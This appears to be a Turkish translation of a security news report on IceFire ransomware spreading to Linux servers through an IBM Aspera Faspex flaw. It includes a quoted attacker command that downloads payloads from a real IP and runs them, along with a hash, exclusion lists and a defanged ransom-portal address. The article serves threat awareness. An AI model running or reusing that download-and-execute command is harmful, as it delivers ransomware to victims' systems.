Son zamanlarda, SentinelOne’daki güvenlik analistleri, hem Windows hem de Linux kurumsal ağlarına saldırdığı tespit edilen kötü şöhretli bir IceFire fidye yazılımı hakkında bilgi sahibi oldu.
Bir IceFire fidye yazılımı saldırısı, kurbanın dosyalarını şifreler ve bunların şifresini çözmek için anahtar karşılığında ödeme talep eder. Bu kötü amaçlı yazılım, ilk keşfedildiği 2020 yılından bu yana hem bireylerin kişisel bilgisayarlarına hem de büyük kuruluşların bilgisayarlarına büyük zararlar verdi.
Son haftalarda, bilgisayar korsanları “IceFire” fidye yazılımını Linux kurumsal ağlarına karşı konuşlandırıyor; bu, önceki Windows tabanlı ağlardaki kullanımına göre büyük bir değişiklik. Esas olarak bu saldırıları internete bağlı Linux ağlarına karşı başlatıyor.
IceFire Fidye Yazılımı Linux ve Windows
Analize göre, IceFire Linux sürümü olan AMD64 mimarisi için gcc ile 2.18 MB’lık bir ikili dosya derlendi:-
- SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973
Bir IceFire örneği, iki Intel tabanlı dağıtım olan Ubuntu ve Debian üzerinde test edildi; her iki test sistemi de IceFire’ı başarıyla çalıştırdı. Sistem tarafından wget kullanılarak iki yükün indirilmesi gerçekleştirildi ve bunlar şuraya kaydedildi: –
/opt/aspera/faspex:
sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo
IBM Aspera Faspex’teki Kusurdan Yararlanma
Aspera Faspex dosya paylaşım yazılımı, CVE-2022-47986 olarak izlenen ve IceFire operatörlerinin hedeflerin güvenlik açığı bulunan sistemlerine erişim elde etmek ve bu sistemlere fidye yazılımı yükleri yüklemek için yararlandığı bir seri kaldırma güvenlik açığı içerir.
Shodan veri tabanına göre, çoğu Amerika Birleşik Devletleri ve Çin’de bulunan yaklaşık 150 Aspera Faspex sunucusu şu anda çevrimiçi durumda.
Linux’un, özellikle büyük ölçekli dağıtımlar söz konusu olduğunda, fidye yazılımı dağıtmanın Windows’a göre daha zor olduğu görülmüştür.
Bu soruna bir çözüm olarak aktörler, IBM Aspera sistemindeki bir güvenlik açığından yararlanarak faydalı yükleri dağıtan IceFire operatörünün gösterdiği gibi, uygulama güvenlik açıklarından yararlanma eğilimindedir.”
Hackerlar Linux’u Hedefliyor
Veritabanlarını barındırma, Web sunucuları ve kuruluş için görev açısından kritik olan diğer uygulamalar gibi önemli görevleri gerçekleştirmek için kuruluş ayarlarında Linux tabanlı sistemlerin kullanılması yaygın bir uygulamadır.
Bu nedenle, başarılı bir saldırıdan tipik bir Windows kullanıcısına kıyasla daha yüksek bir ödeme olasılığı nedeniyle, bu sistemler genellikle fidye yazılımı aktörleri tarafından Windows tabanlı bilgisayarlardan daha değerli hedefler olarak görülür.
Hariç Tutulan Dosyalar ve Klasörler
Örneğin bir parçası olarak, veri bölümleri tarafından başvurulan dosya uzantılarının bir listesi vardır. Yürütülebilir dosyalara, uygulamalara veya sistem işlevlerine gönderme yaptıkları için bu uzantılar şifrelemenin dışında tutulur.
Hariç Tutulan Dosyalar:
.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx
Hariç Tutulan Klasörler:
- /boot: Başlangıçta kullanılan veriler
- /dev: Aygıt dosyaları, sürücüler
- /etc: Sistem yapılandırma dosyaları
- /lib: Bir uygulama veya sistem, işlevselliği dinamik olarak bağlamak için paylaşılan bir kitaplık kullanır
- /proc: Linux, PID’ler, bağlı sürücüler, sistem yapılandırmaları vb. gibi sistemle ilgili çalışma zamanı bilgilerini depolamak için sanal bir dosya sistemi sunar.
- /srv: Web sunucusu dizinleri
- /sys: Çekirdeğe arayüz; /proc’a benzer
- /usr: Kullanıcı düzeyinde ikili dosyalar ve statik veriler
- /var: Dinamik veriler, örneğin önbellekler, veritabanları
- /run: PID dosyaları dahil olmak üzere sistem bilgisi; her yeniden başlatmada temizlenir
Fidye Notları
IceFire, fidye notunu, dosya şifreleme için hedeflenen her dizine bırakılan ve yazılan bir ikili kaynağa yerleştirir.
Fidye notuna sabit kodlanmış bir kullanıcı adı ve parola dahildir, böylece bir Tor-hidden hizmetinde barındırılan fidye ödeme portalına şu adresten giriş yapabilirsiniz:-
- 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]soğan
IceFire’ın bu evriminden, Linux’u hedef alan fidye yazılımlarının popülaritesinin, ne kadar uzun sürerse sürsün, 2023 yılına kadar artmaya devam edeceği açıktır.
Fidye yazılımının Linux’a karşı dağıtımı, özellikle de bunu büyük ölçekte yapmak istiyorsanız, Windows’tan çok daha zordur.
SentinelOne’daki siber güvenlik ekibi, fidye yazılımı saldırısının tüm temel ayrıntılarını sağlamak için elinden gelenin en iyisini yaptı.
Ağ Güvenliği Kontrol Listesi – Ücretsiz E-Kitap İndirin